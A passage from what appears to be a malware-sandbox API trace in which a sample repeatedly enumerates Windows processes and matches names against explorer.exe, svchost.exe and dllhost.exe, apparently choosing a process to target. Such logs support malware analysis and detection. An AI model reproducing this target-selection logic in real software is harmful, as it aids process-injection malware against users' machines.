lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0203.069] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x36c) returned 0x0 [0203.069] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0203.069] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a8) returned 0x0 [0203.069] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0203.071] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3f8) returned 0x0 [0203.071] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0203.072] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x124) returned 0x0 [0203.072] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0203.072] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x448) returned 0xd8 [0203.072] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0203.072] CloseHandle (hObject=0xd8) returned 1 [0203.072] lstrcmpiA (lpString1="dwm.exe", lpString2="explorer.exe") returned -1 [0203.072] lstrcmpiA (lpString1="dwm.exe", lpString2="svchost.exe") returned -1 [0203.072] lstrcmpiA (lpString1="dwm.exe", lpString2="dllhost.exe") returned 1 [0203.072] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0203.073] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x480) returned 0x0 [0203.073] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0203.073] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4ac) returned 0xd8 [0203.074] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0203.074] CloseHandle (hObject=0xd8) returned 1 [0203.074] lstrcmpiA (lpString1="taskhost.exe", lpString2="explorer.exe") returned 1 [0203.074] lstrcmpiA (lpString1="taskhost.exe", lpString2="svchost.exe") returned 1 [0203.074] lstrcmpiA (lpString1="taskhost.exe", lpString2="dllhost.exe") returned 1 [0203.074] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0203.074] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4d4) returned 0x0 [0203.074] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0203.075] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x0 [0203.075] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0203.075] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc4) returned 0xd8 [0203.075] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0203.075] CloseHandle (hObject=0xd8) returned 1 [0203.075] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0203.076] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x62c) returned 0xd8 [0203.076] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0203.076] CloseHandle (hObject=0xd8) returned 1 [0203.076] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0203.076] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5a4) returned 0xd8 [0203.076] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0203.076] CloseHandle (hObject=0xd8) returned 1 [0203.077] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0203.077] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x780) returned 0xd8 [0203.077] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0203.077] CloseHandle (hObject=0xd8) returned 1 [0203.077] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0203.078] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x240) returned 0xd8 [0203.078] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0203.078] CloseHandle (hObject=0xd8) returned 1 [0203.078] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0203.078] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2c8) returned 0xd8 [0203.078] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0203.078] CloseHandle (hObject=0xd8) returned 1 [0203.078] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0203.079] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0xd8 [0203.079] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0203.079] CloseHandle (hObject=0xd8) returned 1 [0203.079] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0203.079] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x314) returned 0xd8 [0203.079] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0203.080] CloseHandle (hObject=0xd8) returned 1 [0203.080] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0203.080] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x320) returned 0xd8 [0203.080] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0203.080] CloseHandle (hObject=0xd8) returned 1 [0203.080] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0203.081] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7a4) returned 0xd8 [0203.081] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0203.081] CloseHandle (hObject=0xd8) returned 1 [0203.081] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0203.081] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x688) returned 0xd8 [0203.081] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0203.081] CloseHandle (hObject=0xd8) returned 1 [0203.081] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0203.082] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7f0) returned 0xd8 [0203.082] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0203.082] CloseHandle (hObject=0xd8) returned 1 [0203.082] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0203.083] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d4) returned 0xd8 [0203.083] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0203.083] CloseHandle (hObject=0xd8) returned 1 [0203.083] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0203.083] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x58c) returned 0xd8 [0203.083] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0203.083] CloseHandle (hObject=0xd8) returned 1 [0203.083] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0203.084] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x644) returned 0xd8 [0203.084] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0203.084] CloseHandle (hObject=0xd8) returned 1 [0203.084] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0203.084] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7e0) returned 0xd8 [0203.084] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0203.084] CloseHandle (hObject=0xd8) returned 1 [0203.084] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0203.085] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5d8) returned 0xd8 [0203.085] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0203.085] CloseHandle (hObject=0xd8) returned 1 [0203.085] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0203.085] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d8) returned 0xd8 [0203.086] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0203.086] CloseHandle (hObject=0xd8) returned 1 [0203.086] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0203.086] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2ac) returned 0xd8 [0203.086] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0203.086] CloseHandle (hObject=0xd8) returned 1 [0203.086] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0203.087] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7fc) returned 0xd8 [0203.087] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0203.087] CloseHandle (hObject=0xd8) returned 1 [0203.087] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0203.087] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x53c) returned 0xd8 [0203.087] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0203.087] CloseHandle (hObject=0xd8) returned 1 [0203.087] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0203.088] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6b4) returned 0x0 [0203.088] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0203.088] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x0 [0203.088] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0203.089] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa58) returned 0x0 [0203.089] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0203.090] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa70) returned 0x0 [0203.090] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0203.090] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xb00) returned 0x0 [0203.090] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0203.091] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xb84) returned 0x0 [0203.091] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0203.091] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbdc) returned 0xd8 [0203.091] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0203.091] CloseHandle (hObject=0xd8) returned 1 [0203.091] lstrcmpiA (lpString1="explorer.exe", lpString2="explorer.exe") returned 0 [0203.091] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0203.092] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x790) returned 0xd8 [0203.092] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0203.092] CloseHandle (hObject=0xd8) returned 1 [0203.092] lstrcmpiA (lpString1="taskeng.exe", lpString2="explorer.exe") returned 1 [0203.092] lstrcmpiA (lpString1="taskeng.exe", lpString2="svchost.exe") returned 1 [0203.092] lstrcmpiA (lpString1="taskeng.exe", lpString2="dllhost.exe") returned 1 [0203.092] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0203.092] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6ac) returned 0x0 [0203.092] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0203.204] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x92c) returned 0xd8 [0203.204] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0203.204] CloseHandle (hObject=0xd8) returned 1 [0203.204] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0203.204] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0xd8 [0203.204] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0203.204] CloseHandle (hObject=0xd8) returned 1 [0203.205] lstrcmpiA (lpString1="explorer.exe", lpString2="explorer.exe") returned 0 [0203.205] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0203.205] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x958) returned 0xd8 [0203.205] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0203.205] CloseHandle (hObject=0xd8) returned 1 [0203.205] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0203.206] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x6ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="gtjtdfe")) returned 1 [0203.206] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5b8) returned 0xd8 [0203.206] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0203.206] CloseHandle (hObject=0xd8) returned 1 [0203.206] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0203.207] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5e4) returned 0x0 [0203.207] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 0 [0203.207] CloseHandle (hObject=0xd4) returned 1 [0203.207] Sleep (dwMilliseconds=0x3e8) [0204.228] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xd4 [0204.231] Process32First (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0204.231] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0204.231] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0204.231] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0204.232] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0204.232] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x104) returned 0x0 [0204.232] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0204.233] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x148) returned 0x0 [0204.233] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0204.233] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x17c) returned 0x0 [0204.233] Process32Next (in: hSnapshot=0xd4, 